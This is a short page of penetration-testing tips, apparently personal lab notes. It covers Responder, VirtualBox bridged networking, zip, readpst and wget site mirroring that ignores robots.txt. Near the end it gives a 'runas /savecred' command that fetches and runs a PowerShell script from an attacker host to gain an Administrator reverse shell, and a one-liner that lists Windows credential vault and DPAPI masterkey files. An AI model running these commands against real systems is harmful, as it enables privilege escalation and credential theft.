Basic tips/scripts

Bypass Responder errors

"/usr/share/responder/./Responder.py:366: DeprecationWarning: setDaemon() is deprecated, set the daemon attribute instead"

Use python3.9 version!
:> sudo python3.9 /usr/share/responder/Responder.py -I eth0 

Windows 11 is not listing a bridged adapter for VirtualBox

  1. Open windows start button.

  2. Search for: network.

  3. Choose: View network connections via the control panel.

  4. Right click your primary connection (for me it was just Ethernet since I'm on a wired connection).

  5. Select: Properties.

  6. Click: Install....

  7. Select: Service.

  8. Click: Add....

  9. Click: Have Disk....

  10. Click: Browse.

  11. Navigate to the associated virtualbox install location for your given drive. For example mine was: C:\Program Files\Oracle\VirtualBox\drivers\network\netlwf.

  12. Select the file: VBoxNetLwf.inf in the above directory.

  13. Click: OK.

  14. Select: VirtualBox NDIS6 Bridged Networking Driver.

  15. Click: OK.

File compressing with exception

zip -r files/temp/images.zip * -x "files/*" "*.jpg" "*.png" "*.gif" "*.jpeg" "*.wmv" "*.pdf" "*.wma" "files/imagenes/look*"

Open PST files - Linux

readpst -tea -m Access\ Control.pst

Download everything from a website

wget --limit-rate=200k --no-clobber --convert-links --random-wait -r -l 50 -p -E -e robots=off -U mozilla http://xxxxxx

Exploiting "runas /savecred"

The following command is used to start a PowerShell reverse shell as ACCESS\Administrator.

runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object
Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')"

Extract credentials Windows

The following "one-liner" will identify the available credential files and masterkeys.

cmd /c " dir /S /AS C:\Users\security\AppData\Local\Microsoft\Vault & dir /S /AS
C:\Users\security\AppData\Local\Microsoft\Credentials & dir /S /AS
C:\Users\security\AppData\Local\Microsoft\Protect & dir /S /AS
C:\Users\security\AppData\Roaming\Microsoft\Vault & dir /S /AS
C:\Users\security\AppData\Roaming\Microsoft\Credentials & dir /S /AS
C:\Users\security\AppData\Roaming\Microsoft\Protect"

Last updated